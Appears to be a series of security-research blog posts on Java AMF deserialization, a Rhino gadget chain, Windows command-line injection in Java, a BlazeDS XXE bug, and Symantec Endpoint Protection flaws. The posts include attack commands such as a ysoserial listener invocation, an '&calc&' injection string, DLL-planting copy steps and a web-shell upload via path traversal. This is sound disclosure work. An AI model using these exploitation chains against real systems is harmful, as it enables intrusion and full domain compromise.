  4. https://cal.sap.com/
  5. https://github.com/codewhitesec/sap-p4-java-deserialization-exploit
  6. https://tools.hana.ondemand.com/additional/sapjvm-6.1.099-linux-x64.zip
  7. SAP Note 1875035 (available to customers since June, 2013) for SAP JVM 5
  8. SAP Note 1875026 (available to customers since June, 2013) for SAP JVM 6
  9. SAP Note 1875042 (available to customers since June, 2013) for SAP JVM 7
  10. SAP note 2443673 from April 2017

AMF – Another Malicious Format

4 April 2017 at 14:01

AMF is a binary serialization format primarily used by Flash applications. Code White has found that several Java AMF libraries contain vulnerabilities, which result in unauthenticated remote code execution. As AMF is widely used, these vulnerabilities may affect products of numerous vendors, including Adobe, Atlassian, HPE, SonicWall, and VMware.

Vulnerability disclosure has been coordinated with US CERT (see US CERT VU#307983).

Summary

Code White has analyzed the following popular Java AMF implementations:

Each of these have been found to be affected by one or more of the following vulnerabilities:

  • XML external entity resolution (XXE)
  • Creation of arbitrary objects and setting of properties
  • Java Deserialization via RMI

The former two vulnerabilities are not completely new.1 But we found that other implementations are also vulnerable. Finally, a way to turn a design flaw common to all implementations into a Java deserialization vulnerability has been discovered.

XXE JavaBeans Setters Deserialization via RMI
Adobe Flex BlazeDS
4.6.0.23207
Apache Flex BlazeDS
4.7.2
Flamingo AMF Serializer
2.2.0
GraniteDS
3.1.1.GA
WebORB for Java
5.1.0.0

We'll get into details later, except for the XXE. If you're looking for details on that, have a look at our previous blog post CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerabilty.

Introduction

The Action Message Format version 3 (AMF3) is a binary message format mainly used by Flash applications for communicating with the back end. Like JSON, it supports different kind of basic data types. For backwards compatibility, AMF3 is implemented as an extension of the original AMF (often referred to as AMF0), with AMF3 being a newly introduced AMF0 object type.

One of the new features of AMF3 objects is the addition of two certain characteristics, so called traits:

[…] ActionScript 3.0 introduces two further traits to describe how objects are serialized, namely 'dynamic' and 'externalizable'. The following table outlines the terms and their meanings:
  • […]
  • Dynamic: an instance of a Class definition with the dynamic trait declared; public variable members can be added and removed from instances dynamically at runtime
  • Externalizable: an instance of a Class that implements flash.utils.IExternalizable and completely controls the serialization of its members (no property names are included in the trait information).
http://www.adobe.com/go/amfspec

Let's elaborate on these new traits, especially on how these are implemented and the resulting implications.

The Dynamic Trait

The dynamic trait is comparable to JavaBeans functionality: it allows the creation of an object by specifying its class name and its properties by name and value. And actually, many implementations use existing JavaBeans utilities such as the java.beans.Introspector (e. g., Flamingo, Flex BlazeDS, WebORB) or they implement their own introspector with similar functionality (e. g., GraniteDS).

That this kind of functionality can pose an exploitable vulnerability has already been noticed and shown various times. Frankly, Wouter Coekaerts had already reported this kind of vulnerability in some AMF implementations in 2011 and published an exploit for applications based on Catalina (e. g., Tomcat) in 2016. And with the advent of Java deserialization vulnerability research, even a way of extending arbitrary setter calls to Java deserialization using JRE classes only has been suggested.

The Externalizable Trait

The externalizable trait is comparable to Java's java.io.Externalizable interface. And in fact, all mentioned library vendors actually interpreted the flash.utils.IExternalizable interface from the specification as being equivalent to Java's java.io.Externalizable, effectively allowing the reconstruction of any class implementing the java.io.Externalizable interface.

Short excursion regarding the different between java.io.Serializable and java.io.Externalizable: if you look at the java.io.Serializable interface, you'll see it is empty. So there are no formal contracts that can be enforced at build time by the compiler. But classes implementing the java.io.Serializable interface have the option to override the default serialization/deserialization by implementing various methods. That means there are a lot of additional checks during runtime whether an actual object implements one of these opt-in methods, which makes the whole process bloated and slow.

Therefore, the java.io.Externalizable interface was introduced, which specifies two methods, readExternal(java.io.ObjectInput) and writeExternal(java.io.ObjectInput), that give the class complete control over the serialization/deserialization. This means no default serialization/deserialization behavior, no additional checks during runtime, no magic. That makes serialization/deserialization using java.io.Externalizable much simpler and thus faster than using java.io.Serializable.

But now let's get back on track.

Turning Externalizable.readExternal into ObjectInputStream.readObject

In OpenJDK 8u121, there are 15 classes implementing the java.io.Externalizable and most of them only do boring stuff like reconstructing an object's state. Additionally, the actual instances of the java.io.ObjectInput passed to Externalizable.readExternal(java.io.ObjectInput) methods of the implementations are also not an instance of java.io.ObjectInputStream. So no quick win here.

Of these 15 classes, those related to RMI stood out. That word alone should make you sit up. Especially sun.rmi.server.UnicastRef and sun.rmi.server.UnicastRef2 seemed interesting, as they reconstruct a sun.rmi.transport.LiveRef object via its sun.rmi.transport.LiveRef.read(ObjectInput, boolean) method. This method then reconstructs a sun.rmi.transport.tcp.TCPEndpoint and a local sun.rmi.transport.LiveRef and registers it at the sun.rmi.transport.DGCClient, the RMI distributed garbage collector client:

DGCClient implements the client-side of the RMI distributed garbage collection system.

The external interface to DGCClient is the "registerRefs" method. When a LiveRef to a remote object enters the VM, it needs to be registered with the DGCClient to participate in distributed garbage collection.

When the first LiveRef to a particular remote object is registered, a "dirty" call is made to the server-side distributed garbage collector for the remote object […]

http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/jdk8u121-b00/src/share/classes/sun/rmi/transport/DGCClient.java#l54

So according to the documentation, the registration of our LiveRef results in the call for a remote object to the endpoint specified in our LiveRef? Sounds like RCE via RMI!

Tracing the call hierarchy of ObjectInputStream.readObject actually reveals that there is a path from an Externalizable.readExternal call via sun.rmi.server.UnicastRef/sun.rmi.server.UnicastRef2 to ObjectInputStream.readObject in sun.rmi.transport.StreamRemoteCall.executeCall().

So let's see what happens if we deserialize an AMF message with a sun.rmi.server.UnicastRef object using the following code utilizing Flex BlazeDS:

As a first proof of concept, we just start a listener with netcat and see if the connection gets established.

And we actually got a connection from a client, trying to speak the Java RMI Transport Protocol. 😃

Exploitation

This technique has already been shown as a deserialization blacklist bypass by Jacob Baines in 2016, but I'm not sure if he was aware that it also turns any Externalizable.readExternal into an ObjectInputStream.readObject. He also presented a JRMP listener that sends a specified payload. Later, the JRMP listener has been added to ysoserial, which can deliver any available payload:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener ...

Mitigation

  • Applications using Adobe's/Apache's implementation should migrate to Apache's latest release version 4.7.3, that addresses this issue.
  • Exadel has discontinued its library, so there won't be any updates.
  • For GraniteDS and WebORB for Java, there is currently no response/solution.

Coincidentally, there is the JDK Enhancement Proposal JEP 290: Filter Incoming Serialization Data addressing the issue of Java deserialization vulnerabilities in general, which has already been implemented in the most recent JDK versions 6u141, 7u131, and 8u121.


Return of the Rhino: An old gadget revisited

4 May 2016 at 19:06
[Update 08/05/2015: Added reference to CVE-2012-3213 of James Forshaw. Thanks for the heads up]

As already mentioned in our Infiltrate '16 and RuhrSec '16 talks, Code White spent some research time to look for serialization gadgets. Apart from the Javassist/Weld gadget we also found an old but interesting gadget, only using classes from the Java Runtime Environment (so called JRE gadget).

We called the gadget Return of the Rhino since the relevant gadget classes are part of the Javascript engine Rhino, bundled with Oracle JRE6 and JRE7.
As you may already know, the Rhino Script engine has already been abused in JVM sandbox escapes in the past (e.g. CVE-2011-3544 of Michael Schierl and CVE-2012-3213 of James Forshaw).

We stumbled over the gadget just by accident as we realized that there is a huge difference between the official Oracle JRE and the JRE's bundled in common Linux distros.
Most may not know that the Rhino Script Engine is actively developed by the Mozilla Project and distributed as a standalone package/jar (packages under org.mozilla.*). Furthermore, Oracle JRE6/7 is bundling an old fork of Rhino (packages under sun.org.mozilla.*).  Surprisingly, Oracle applied some hardening to Rhino core classes with JRE7u1513, not being serializable anymore. The changes were made to fix a sandbox escape (CVE-2012-3213) of James Forshaw (see James' blog post).

 But those hardening changes were not incorporated into Mozilla's Rhino mainline, which happens once in a while. So the gadget still works if you are using OpenJdk bundled with Ubuntu or Debian.
Let's take a look at the static view of some Rhino core classes:



In the Rhino Javascript domain almost every Javascript language object is represented as a ScriptableObject in the Java domain.
Functions, Types, Regexes and several other Javascript objects are implemented in Java classes, extending ScriptableObject.
A ScriptableObject has two interesting members. A reference to its prototype object and an array of Slot objects. The slots store the properties of a Javascript object. The Slot can either be Slot, GetterSlot or RelinkedSlot. For our gadget we only focus on the GetterSlot inner class.
Every Slot class has a getValue() method used to retrieve the value of the property. In case of a GetterSlot the value is taken from a call to either a MemberBox or Function instance. And both MemberBox and Function instances do dynamic method calls using Java's Reflection API. That's already the essence of the story :-). But let's go into details.

The class NativeError is a successor of IdScriptableObject which inherits from ScriptableObject. ScriptableObject implements the tagging interface Serializable, hence all successors like NativeError are serializable. The class NativeError has an interesting way of how toString() is performed:

In the very beginning toString() just calls js_toSting(this).

And now we reach the point where it gets interesting. In the first line of js_toString(), a property called "name" is retrieved from the NativeError instance using the static method ScriptableObject.getProperty().






In ScriptableObject.getProperty() the property value is retrieved by calling the IdScriptableObject.get() method which delegates the property resolution call to its ancestor ScriptableObject.

ScriptableObject gets the value of the property from the Slot instance of the Slot[] by calling the getValue() method.
In case of a ScriptableObject$GetterSlot (inner class of ScriptableObject) we finally reach the code where reflection calls are eventually happening.
As already shown in the static class view, ScriptableObject$GetterSlot has a member "getter" of class Object. In the getValue() method of ScriptableObject$GetterSlot two cases are checked.


In case of getter being an instance of MemberBox, the invoke method on the MemberBox instance is called which just wraps a dynamic call using Java's Reflection API.



The Method object used in the reflection call comes from the member variable "memberObject" of class MemberBox. Although "memberObject" is of type java.lang.reflect.Member, only java.lang.reflect.Method or java.lang.reflect.Constructor instances are valid classes for "memberObject". Both java.lang.reflect.Method and java.lang.reflect.Constructor are not serializable, so obviously the value of "memberObject" needs to be set in the readObject() method of MemberBox during deserialization.





Specifically, "memberObject" is set in method readMember(), creating a java.lang.reflect.Method object using values coming from the serialized object stream.








So we can control the java.lang.reflect.Method object used in the reflection call. How about the instance ("getterThis") on which method gets invoked? Is this instance also created from the serialized object stream and hence under our control? If we look back into the implementation of method ScriptableObject$GetterSlot.getValue(), we see that the value of "getterThis" depends on the value of member "delegateTo" of the MemberBox instance. "delegateTo" is marked transient and is not set in readObject() during deserialization. So the first case of the if-statement applies and "getterThis" is assigned to "start" which is our NativeError instance. And the arguments of the reflection call are just set to an empty Object[]. Bad for us, but there's hope as we will see later.

Looking again at ScriptableObject$GetterSlot.getValue() we see a second case, if "getter" is an instance of Function. The interface Function sounds very interesting.







And we have plenty of classes implementing Function, most of them being serializable.





















From all those classes the serializable NativeJavaMethod class nearly jumped into our face. Before we go into details, let's take another look at the static view of some Rhino core classes, taking the NativeJavaMethod into account.



And a quick look into the call() method revealed the following: In the beginning, the "index" variable is returned from the call to method findCachedFunction(). This method eventually calls findFunction() which calculates one MemberBox instance from the member "methods"(of type MemberBox[]) using a more or less complex algorithm. If the methods array has only one element, findCachedFunction() will just return 0 as the index value.

The variable "meth" is assigned to methods[0]. Just keep in mind that the member "methods" is under our control as it comes from the serialized object stream. At the very end of the figure we have a dynamic method invocation, as the method invoke() is called on the MethodBox instance "meth". So we can control the Method object/method to be invoked which is half the battle.



How about the target instance "javaObject". Can we control it?
We might be able to control it if "o" is an instance of Wrapper. Then, the unwrap() method on "o" is called and the return value assigned to "javaObject". "o" is assigned to "thisObject" which is our NativeError instance. NativeError is not of type Wrapper, but we can see a "for" loop which reassigns "o" to the prototype object of "o" using the getPrototype() method.
So if you can set the prototypeObject member of our NativeError instance to a Wrapper instance and get the unwrap() method to return an object under our control we are ready to go!
And the serializable class NativeJavaObject does what is needed here. It just returns the value of the member "javaObject" in its unwrap() method.


Another update to the static view of some Rhino core classes, taking NativeJavaObject into account.








So apperently the only thing we need to do is to create a NativeError instance, set its prototype to a NativeJavaObject which wraps our target instance, create a NativeJavaMethod and specify the method to be invoked on the target instance, serialize it and deserialize it again. But now we get the following exception:



Looks like we need a Context being associated with the current thread :-(
But hey! There is a static method Context.enter() which sets the Context we really need. We just need to trigger it in advance. But how to call Context.enter() if we can't use a MethodBox nor a NativeJavaMethod. To get around this, we use a trick we had known for a while:

When you do a reflection call, the target object is ignored, if the method to be invoked is a static method. That's it.



And if you look back, we already had found a call to invoke() on a MemberBox instance being triggered from method ScriptableObject$GetterSlot.getValue(). But the first argument was always our NativeError instance. As already mentioned, the first argument gets ignored if you use a static method such as Context.enter() as your target method :-).
So if we would have two property accesses on NativeError, we could then trigger a reflection call on Context.enter() using a MemberBox and then another reflection call using a NativeJavaMethod.
Luckily, we have two property accesses in method  js_toString() of class NativeError:





The only remaining problem is how to trigger a toString() call on a NativeError object during deserialization. As you may have already seen in our Infiltrate '16 or RuhrSec '16 slidedecks you can use the "trampoline" class javax.management.BadAttributeValueExpException for that.




Getting code execution is trivial now. You can use Adam Gowdiak's technique and create a serializable com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl instance and invoke the newTransformer() method on it by using the reflection primitive of NativeJavaMethod. Or you just invoke the execute() method on a serializable com.sun.rowset.JdbcRowSetImpl instance and load a RMI class from your server (for further details see our Infiltrate '16 or RuhrSec '16  slidedecks).

Infiltrate 2016 Slidedeck: Java Deserialization Vulnerabilities

12 April 2016 at 14:11
The outcome of Code White's research efforts into Java deserialization vulnerabilities was presented at Infiltrate 2016 by Matthias Kaiser.

The talk gave an introduction into finding and exploiting Java deserialization vulnerabilities. Technical details about the Oracle Weblogic deserialization RCE (CVE-2015-4852) and a SAP Netweaver AS Java 0day were shown.

The slidedeck doesn't include the SAP Netweaver AS Java 0day POC and it won't be published until fixed.

It  can be found here:
http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class

Stay tuned!

Compromised by Endpoint Protection: Legacy Edition

23 February 2016 at 13:50

The previous disclosure of the vulnerabilities in Symantec Endpoint Protection (SEP) 12.x showed that a compromise of both the SEP Manager as well as the managed clients is possible and can have a severe impact on a whole corporate environment.

Unfortunately, in older versions of SEP, namely the versions 11.x, some of the flawed features of 12.x weren’t even implemented, e. g., the password reset feature. However, SEP 11.x has other vulnerabilities that can have in the same impact.

Vulnerabilities in Symantec Endpoint Protection 11.x

The following vulnerabilities have been discovered in Symantec Endpoint Protection 11.x:

SEP Manager
SQL Injection
Allows the execution of arbitrary SQL on the SQL Server by unauthenticated users.
Command Injection
Allows the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges by users with write acceess to the database, e. g., via the before-mentioned SQL injection.
SEP Client
Binary Planting
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows by local users.

As SEP 11.x is out of support since early 2015 and Symantec won’t provide a patch, you are highly advised to upgrade to 12.1.

SEP Manager

SQL Injection

The AgentRegister operation of the AgentServlet is vulnerable to SQL injections within the HardwareKey attribute:

To reach that point, we need to provide a valid DomainID, which can be retrieved from a SEP client installation from the SyLink.xml file located in C:\ProgramData\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Config.

Exploiting this vulnerability is a little more complicated. For example, changing a SEPM administrator user’s password requires the manipulation of a configuration stored as an XML document in the database.

The administrative users are stored in the SemConfigRoot document in the basic_metadata table with the hard-coded ID B655E64D0A320801000000E164041B79. An administrator entry might look like this:

The complicated part is that this configuration document is crucial for the whole SEPM. Any changes resulting in an invalid XML document result in a denial of service. That’s why it’s important that any change results in a valid document as well.

So how can we modify that document to our advantages?

The stored PasswordHash is simply the MD5 of the password in hexadecimal representation. So replacing that attribute value with a new one would allow us to login with that password.

But we neither know the current PasswordHash value (obviously!) nor any other attribute value that we can use as an anchor point for the string manipulate.

However, we know other parts of the SemAdministrator element that we can use. For example, if we replace ' PasswordHash=' by ' PasswordHash="[…]" OldPasswordHash=', we can set our own PasswordHash value while being able to reverse the operation by replacing ' PasswordHash="[…]" OldPasswordHash=' by ' PasswordHash=':

Here we first do the reverse operation in line 14 before updating the PasswordHash value with ours in line 15 to avoid accidentally creating an invalid document in the case the update is executed multiple times.

There may also be other attributes that needs to be modified like the Name or AuthenticationMethod for local instead of RSA SecureId or Directory authentication.

The reset would be just doing the reverse operation on the XML document:

Now we can log into the SEPM and could exploit CVE-2015-1490 to upload arbitrary files to the SEPM server, resulting in the execution of arbitrary code with 'NT Authority\SYSTEM' privileges.

If changing the admin password does not work for some reasons, you can also use the SQL injection to exploit the command injection described next.

Command Injection

From the previous blog post on Java and Command Line Injections in Windows we know that injecting additional arguments and even commands may be possible in Java applications on Windows, even when ProcessBuilder is utilized.

SEPM does create processes only in a few locations but even less seem promising and can be triggered. The SecurityAlertNotifyTask class is one of them, which processes security alerts from the database, which we can modify with the SQL injection.

The notification tasks are stored in the notification table. For manipulating the command line, we need to reach the doRunExecutable(String) method. This happens if the notification.email contains batchfile. The executable to call is taken from notification.batch_file_name. However, only existing files from the C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin directory can be specified.

The next problem is to find a way to manipulate arguments used in the building of the command line. The only additional argument passed is the parameter of the doRunExecutable method. Unfortunately, the values passed are notification messages originating from a properties file and most of them are parameterized with integers only.

However, the notification message for a new virus is parameterized with the name of the new virus, which originates from the database as well. So if we register a new virus with our command line injection payload as the virus name and register a new security alert notification, the given batch file would be called with the predefined notification message containing the command line injection. And since .bat files are silently started in a cmd.exe shell environment, it should be easy to get a calc.

The following SQL statements set up the mentioned security alert notification scenario:

The resulting CreateProcess command line is:

    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin\dbtools.bat" "New risk found: "&calc&".""

And the command line interpreted by cmd.exe is:

    "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin\dbtools.bat" "New risk found: "&calc&"."

And there we have a calc.

SEP Client

Binary Planting

The Symantec AntiVirus service process Rtvscan.exe of the SEP client is vulnerable to Binary Planting, which can be exploited for local privilege escalation. During the collection of version information of installed engines and definitions, the process is looking for a SyKnAppS.dll in C:\ProgramData\Symantec\SyKnAppS\Updates and loading it if present. This directory is writable by members of the built-in Users group:

The version information collection can be triggered in the SEP client GUI via Help and Support, Troubleshooting..., then Versions. To exploit it, we place our DLL into the C:\ProgramData\Symantec\SyKnAppS\Updates directory. But before that, we need to place the original SyKnAppS.dll from the parent directory in there and trigger the version information collection once as SEP does some verification of the DLL before loading but only once and not each time:

  • Copy genuine SyKnAppS.dll to Updates:
    copy C:\ProgramData\Symantec\SyKnAppS\SyKnAppS.dll C:\ProgramData\Symantec\SyKnAppS\Updates\SyKnAppS.dll
  • Trigger version information collection via Help and Support, Troubleshooting..., then Versions.
  • Copy custom SyKnAppS.dll to Updates:
    copy C:\Users\john\Desktop\SyKnAppS.dll C:\ProgramData\Symantec\SyKnAppS\Updates\SyKnAppS.dll
  • Trigger version information collection again.

The service is running with 'NT Authority\SYSTEM' privileges.

Java and Command Line Injections in Windows

4 February 2016 at 16:03

Everyone knows that incorporating user provided fragments into a command line is dangerous and may lead to command injection. That’s why in Java many suggest using ProcessBuilder instead where the program’s arguments are supposed to be passed discretely in separate strings.

However, in Windows, processes are created with a single command line string. And since there are different and seemingly confusing parsing rules for different runtime environments, proper quoting seems to be likewise complicated.

This makes Java for Windows still vulnerable to injection of additional arguments and even commands into the command line.

Windows’ CreateProcess Command Lines

In Windows, the main function for creating processes is the CreateProcess function. And in contrast to C API functions like execve, arguments are not passed separately as an array of strings but in a single command line. On the other side, the entry point function WinMain expects a single command line argument as well.

This circumstance requires the program to parse the command line itself for extracting the arguments. And although Windows provides a CommandLineToArgvW function and supports C and C++ API entry point functions where arguments are already parsed by the runtime and passed in a argc/argv style, the rules for quoting command line arguments with all their quirks can be quite confusing. And there is no definitive guide on how to quote properly, let alone something like a ArgvToCommandLineW function that does it for you. That’s why many do it wrong, as “Everyone quotes command line arguments the wrong way” by Daniel Colascione observes.

You should definitely read the latter two linked pages first to understand the rest of this blog post.

For testing, we’ll use the following Java class, which utilizes ProcessBuilder as suggested:

The resulting CreateProcess command line can be observed with the Windows Sysinternals’ Process Monitor. And for how the command line gets parsed, you can use the following program, which prints the results of both the parsing of C command-line arguments (via the argv function parameter) and of the parsing of C++ command-line arguments (via CommandLineToArgvW function).

This already produces different and frankly surprising results in some cases:

The last two are remarkable as one additional quotation mark swaps the results of argv and CommandLineToArgvW.

Java’s Command Line Generation in Windows

With the knowledge of how CreateProcess expects the command line arguments to be quoted, let’s see how Java builds the command line and quotes the arguments for Windows.

If a process is started using ProcessBuilder, the arguments are passed to the static method start of ProcessImpl, which is a platform-dependent class. In the Windows implementation of ProcessImpl, the start method calls the private constructor of ProcessImpl, which creates the command line for the CreateProcess call.

In the private constructor of ProcessImpl, there are two operational modes: the legacy mode and the strict mode. These are the result of issues caused by changes to Runtime.exec. The legacy mode is only performed if there is no SecurityManager present and the property jdk.lang.Process.allowAmbiguousCommands is not set to false.

The Legacy Mode

In the legacy mode, the first argument (i. e., the program to execute) is quoted if required and then the command line is created using createCommandLine.

The needsEscaping method checks whether the value is already quoted using isQuoted or wraps it in double quotes if it contains certain characters.

The vertification type VERIFICATION_LEGACY passed to needsEscaping makes noQuotesInside in isQuoted being false, which would allow quotation marks within the path. It also makes needsEscaping test for space and tabulator characters only.

But let’s take a look at the createCommandLine method, which creates the command line:

Again, with the verification type VERIFICATION_LEGACY the needsEscaping method only returns true if it is already wrapped in quotes (regardless of any quotes within the string) or if it is not wrapped in quotes and contains a space or tabulator character (again, regardless of any quotes within the string). If it needs quoting, it is simply wrapped in quotes and a possible trailing backslash is doubled.

Ok, so far, so good. Now let’s recall Daniel Colascione’s conclusion:

Do not:

  1. Simply add quotes around command line argument arguments without any further processing.
  2. […]

Yes, exactly. This can be exploited to inject additional arguments:

  • A value that is considered to be quoted:
    • passed argument value: "arg 1" "arg 2" "arg 3"
    • quoted argument value: no quoting needed as it’s “already quoted”
    • parsed argument values: ['arg 1', 'arg 2', 'arg 3']
  • A value that is considered to be not quoted but requires quotes:
    • passed argument value: "arg" 1" "arg 2" "arg 3
    • quoted argument value: ""arg" 1" "arg 2" "arg 3"
    • parsed argument values: ['arg 1', 'arg 2', 'arg 3']

The Strict Mode

In the strict mode, things are a little different.

If the path contains a quote, getExecutablePath throws an exception and the catch block is executed where getTokensFromCommand tries to extract the path.

However, the rather interesting part is that createCommandLine is called with a different verification type based on whether isShellFile denotes it as a shell file.

But I’ll come back to that later.

With the verification type VERIFICATION_WIN32, noQuotesInside is still false and both injection examples mentioned above work as well.

However, if needsEscaping is called with the verification type VERIFICATION_CMD_BAT, noQuotesInside becomes true. And without being able to inject a quote we can’t escape the quoted argument.

CreateProcess’ Silent cmd.exe Promotion

Remember the isShellFile checked the file name extension for .cmd and .bat? This is due to the fact that CreateProcess executes these files in a cmd.exe shell environment:

[…] the decision tree that CreateProcess goes through to run an image is as follows:

  • […]
  • If the file to run has a .bat or .cmd extension, the image to be run becomes Cmd.exe, the Windows command prompt, and CreateProcess restarts at Stage 1. (The name of the batch file is passed as the first parameter to Cmd.exe.)
  • […]

Windows Internals, 6th edition (Part 1)

That means a 'file.bat …' becomes 'C:\Windows\system32\cmd.exe /c "file.bat …"' and an additional set of quoting rules would need to be applied to avoid command injection in the command line interpreted by cmd.exe.

However, since Java does no additional quoting for this implicit cmd.exe call promotion on the passed arguments, injection is even easier: &calc& does not require any quoting and will be interpreted as a separate command by cmd.exe.

This works in the legacy mode just like in the strict mode if we make isShellFile return false, e. g., by adding whitespace to the end of the path, which tricks the endsWith check but are ignored by CreateProcess.

Conclusion

Command line parsing in Windows is not consistent and therefore the implementation of proper quoting of command line argument even less. This may allow the injection of additional arguments.

Additionally, since CreateProcess implicitly starts .bat and .cmd in a cmd.exe shell environment, even command injection may be possible.

As a sample, Java for Windows fails to properly quote command line arguments. Even with ProcessBuilder where arguments are passed as a list of strings:

  • Argument injection is possible by providing an argument containing further quoted arguments, e. g., '"arg 1" "arg 2" "arg 3"'.
  • On cmd.exe process command lines, a simple '&calc&' alone suffices.

Only within the most strictly mode, the VERIFICATION_CMD_BAT verification type, injection is not possible:

  • Legacy mode:
    • VERIFICATION_LEGACY: There is no SecurityManager present and jdk.lang.Process.allowAmbiguousCommands is not explicitly set to false (no default set)
      • allows argument injection
      • allows command injection in cmd.exe calls (explicit or implicit)
  • Strict mode:
    • VERIFICATION_CMD_BAT: Most strictly mode, file ends with .bat or .cmd
      • does not allow argument injection
      • does not allow command injection in cmd.exe calls
    • VERIFICATION_WIN32: File does not end with .bat or .cmd
      • allows argument injection
      • allows command injection in cmd.exe calls (explicit or implicit)

However, Java’s check for switching to the VERIFICATION_CMD_BAT mode can be circumvented by adding whitespace after the .bat or .cmd.

CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerabilty

24 August 2015 at 11:23

In a recent Product Security Review, Code White Researchers discovered a XXE vulnerability in Apache Flex BlazeDS/Adobe (see ASF Advisory). The vulnerable code can be found in the BlazeDS Remoting/AMF protocol implementation.

All versions before 4.7.1 are vulnerable. Software products providing BlazeDS Remoting destinations might be also affected by the vulnerability (e.g. Adobe LiveCycle Data Services, see APSB15-20).

Vulnerability Details

An AMF message has a header and a body. To parse the body, the method readBody() of AmfMessageDeserializer is called. In this method, the targetURI, responseURI and the length of the body are read. Afterwards, the method readObject() is called which eventually calls the method readObject() of an ActionMessageInput instance (either Amf0Input or Amf3Input).

In case of an Amf0Input instance, the type of the object is read from the next byte. If type has the value 15, the following bytes of the body are parsed in method readXml() as a UTF string.

The xml string gets passed to method stringToDocument of class XMLUtil where the Document is created using the DocumentBuilder.

When a DocumentBuilder is created through the DocumentBuilderFactory, external entities are allowed by default. The developer needs to configure the parser to prevent XXE.

Exploitation

Exploitation is easy, just send the XXE vector of your choice.

Compromised by Endpoint Protection

31 July 2015 at 06:23

In a recent research project, Markus Wulftange of Code White discovered several critical vulnerabilities in the Symantec Endpoint Protection (SEP) suite 12.1, affecting versions prior to 12.1 RU6 MP1 (see SYM15-007).

As with any centralized enterprise management solution, compromising a management server is quite attractive for an attacker, as it generally allows some kind of control over its managed clients. Taking control of the manager can yield a takeover of the whole enterprise network.

In this post, we will take a closer look at some of the discovered vulnerabilities in detail and demonstrate their exploitation. In combination, they effectively allow an unauthenticated attacker the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges on both the SEP Manager (SEPM) server, as well as on SEP clients running Windows. That can result in the full compromise of a whole corporate network.

Vulnerabilities in Symantec Endpoint Protection 12.1

Code White discovered the following vulnerabilities in Symantec Endpoint Protection 12.1:

SEP Manager
Authentication Bypass (CVE-2015-1486)
Allows unauthenticated attackers access to SEPM
Mulitple Path Traversals (CVE-2015-1487, CVE-2015-1488, CVE-2015-1490)
Allows reading and writing arbitrary files, resulting in the execution of arbitrary commands with 'NT Service\semsrv' privileges
Privilege Escalation (CVE-2015-1489)
Allows the execution of arbitrary OS commands with 'NT Authority\SYSTEM' privileges
Multiple SQL Injections (CVE-2015-1491)
Allows the execution of arbitrary SQL
SEP Clients
Binary Planting (CVE-2015-1492)
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows

The objective of our research was to find a direct way to take over a whole Windows domain and thus aimed at a full compromise of the SEPM server and the SEP clients running on Windows. Executing post exploitation techniques, like lateral movement, would be the next step if the domain controller hasn't already been compromised by this.

Therefore, we focused on SEPM's Remote Java or Web Console, which is probably the most exposed interface (accessible via TCP ports 8443 and 9090) and offers most of the functionalities of SEPM's remote interfaces. There are further entry points, which may also be vulnerable and exploitable to gain access to SEPM, its server, or the SEP clients. For example, SEP clients for Mac and Linux may also be vulnerable to Binary Planting.

Attack Vector and Exploitation

A full compromise of the SEPM server and SEP clients running Windows was possible through the following steps:

  1. Gaining administrative access to the SEP Manager (CVE-2015-1486)
  2. Full compromise of SEP Manager server (CVE-2015-1487 and CVE-2015-1489)
  3. Full compromise of SEP clients running Windows (CVE-2015-1492)

CVE-2015-1486: SEPM Authentication Bypass

SEPM uses sessions after the initial authentication. User information is stored in a AdminCredential object, which is associated to the user's session. Assigning the AdminCredential object to a session is implemented in the setAdminCredential method of ConsoleSession, which again holds an HttpSession object.

This setAdminCredential method is only called at two points within the whole application: once in the LoginHandler and once in the ResetPasswordHandler.

Its purpose in LoginHandler is obvious. But why is it used in the ResetPasswordHandler? Let's have a look at it!

Password reset requests are handled by the ResetPasswordHandler handler class. The implementation of the handleRequest method of this handler class can be observed in the following listing:

After the prologue in lines 72-84, the call to the init method calls the findAdminEmail method for looking up the recipient's e-mail address.

Next, the getCredential method is called in line 92 to retrieve the AdminCredential object of the corresponding administrator. The AdminCredential object holds information on the administrator, e. g., if it's a system administrator or a domain administrator as well as an instance of the SemAdministrator class, which finally holds information such as the name, e-mail address, and hashed password of the administrator.

The implementation of the getCredential method can be seen in the following listing:

Line 367 creates a new session, which effectively results in issuing a new JSESSIONID cookie to the client. In line 368, the doGetAdminCredentialWithoutAuthentication method is called to get the AdminCredential object without any authentication based on the provided UserID and Domain parameters.

Finally – and fatally –, the looked up AdminCredential object is associated to the newly created session in line 369, making it a valid and authentic administrator's session. This very session is then handed back to the user who requested the password reset. So by requesting a password reset, you'll also get an authenticated administrator's session!

An example of what a request for a password reset for the built-in system administrator 'admin' might look like can be seen in the following listing:

And the response to the request:

The response contains the JSESSIONID cookie of the newly created session with the admin's AdminCredential object associated to it.

Note that this session cannot be used with the Web console as it is missing some attribute required for AjaxSwing. However, it can be used to communicate with the other APIs like the SPC web services, which, for example, allows creating a new SEPM administrator.

CVE-2015-1487: SEPM Arbitrary File Write

The UploadPackage action of the BinaryFile handler is vulnerable to path traversal, which allows arbitrary files to be written. It is implemented by the BinaryFileHandler handler class. Its handleRequest method handles the requests and the implementation can be observed in the following listing:

Handling of the UploadPackage action starts at line 189. The PackageFile parameter value is used as file name and the KnownHosts parameter value as directory name. Interestingly, the provided directory name is checked for path traversal by looking for directory separators '/' and '\' (see line 196, possibly related to CVE-2014-3439). However, the file name is not, which still allows to specify any arbitrary file location.

The following request results in writing the given POST request body data to the file located at '[…]\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\exec.jsp':

Writing a JSP web shell as shown allows the execution of arbitrary OS commands with 'NT Service\semsrv' privileges.

CVE-2015-1489: SEPM Privilege Escalation

